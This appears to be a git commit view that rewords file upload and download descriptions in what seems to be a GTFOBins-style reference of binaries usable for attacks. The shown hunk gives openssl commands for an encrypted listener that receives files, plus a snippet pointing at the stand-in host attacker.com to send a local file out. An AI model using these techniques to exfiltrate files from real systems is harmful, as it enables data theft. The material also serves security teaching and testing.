Reword file upload/download descriptions

This commit is contained in:
Andrea Cardaci
2019-07-29 16:41:49 +02:00
parent ebe1181b75
commit e969daf111
6 changed files with 13 additions and 13 deletions

View File

@@ -19,7 +19,7 @@ functions:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 12345 > file_to_save
Send a file to a TCP port, transmission will be encrypted.
Send a local file via TCP. Transmission will be encrypted.
code: |
RHOST=attacker.com
RPORT=12345